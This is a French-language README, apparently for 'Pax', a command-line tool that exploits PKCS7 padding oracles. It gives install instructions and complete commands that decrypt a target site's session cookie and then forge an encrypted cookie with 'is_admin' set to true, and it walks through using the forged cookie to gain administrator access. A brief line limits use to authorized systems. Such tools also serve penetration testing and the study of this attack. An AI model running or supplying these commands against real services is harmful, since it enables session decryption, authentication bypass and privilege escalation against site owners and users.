
💀 🔓 Outil en ligne de commande pour les attaques par oracle de padding PKCS7
Exploitez les oracles de padding pour le plaisir et le profit !
Pax (PAdding oracle eXploiter) est un outil pour exploiter les oracles de padding afin de :
Cela peut être utilisé pour divulguer des informations de session chiffrées, et souvent pour contourner l'authentification, élever les privilèges et exécuter du code à distance en chiffrant un texte clair personnalisé et en l'écrivant de nouveau sur le serveur.
Comme toujours, cet outil ne doit être utilisé que sur des systèmes que vous possédez et/ou pour lesquels vous avez l'autorisation de sonder !
Téléchargez depuis les releases, ou installez avec Go :
go get -u github.com/liamg/pax/cmd/pax
Si vous trouvez un oracle suspect, où les données chiffrées sont stockées dans un cookie nommé SESS, vous pouvez utiliser la commande suivante :
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
Cela vous donnera probablement un texte clair, peut-être quelque chose comme :
{"user_id": 456, "is_admin": false}
On dirait que vous pouvez élever vos privilèges ici !
Vous pouvez essayer de le faire en générant d'abord vos propres données chiffrées que l'oracle déchiffrera pour obtenir un texte clair malicieux :
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
Cela produira un autre ensemble de données chiffrées encodées en base64, peut-être quelque chose comme :
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Vous pouvez maintenant ouvrir votre navigateur et définir la valeur du cookie SESS avec la valeur ci-dessus. En chargeant la page oracle d'origine, vous devriez constater que vous avez été élevé au niveau administrateur.
Les guides suivants expliquent en détail cette attaque :